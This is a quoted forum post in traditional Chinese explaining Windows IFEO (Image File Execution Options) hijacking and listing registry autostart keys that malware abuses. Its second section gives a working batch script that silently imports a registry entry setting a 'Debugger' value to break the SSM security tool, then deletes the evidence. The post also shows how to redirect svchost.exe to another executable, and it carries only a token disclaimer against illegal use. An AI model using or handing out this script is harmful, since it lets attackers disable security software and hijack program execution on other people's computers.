QUOTE:
基本癥狀:可能有朋友遇到過這樣的情況,一個正常的程式,無論把他放在哪個位置或者是重新用安裝盤修複過的程式,都無法運行或者是比如運行A卻成了執行B的程式了,而改名後卻可以正常運行。。
既然我們是介紹IFEO技術相關,那我們就先介紹下:
一,什麼是映像脅持(IFEO)?
所謂的IFEO就是Image File Execution Options
在是位於註冊表的
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
由於這個項主要是用來偵錯工具用的,對一般使用者意義不大。預設是只有管理員和local system有權讀寫修改
先看看常規病毒等怎麼修改註冊表吧。。
那些病毒、蠕蟲和,木馬等仍然使用眾所皆知並且過度使用的註冊表索引值,如下:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
等等。。。。。。。。。。。。。。。
二,具體使用資料:
@echo off //關閉命令回顯
echo 此批處理只作技巧介紹,請勿用於非法活動!//顯示echo後的文字
pause //停止
echo Windows Registry Editor Version 5.00>>ssm.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\syssafe.EXE] >>ssm.reg
echo "Debugger"="syssafe.EXE" >>ssm.reg //把echo後的文字匯出到SSM.reg中
regedit /s ssm.reg &del /q ssm.reg //匯入ssm.reg並刪除
使SSM失效HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\svchost.exe項下的"Debugger"="abc.exe" 意思是不執行svchost.exe而執行abc.exe
使用這個方法,可以把特定的名稱的exe檔案的執行重新導向。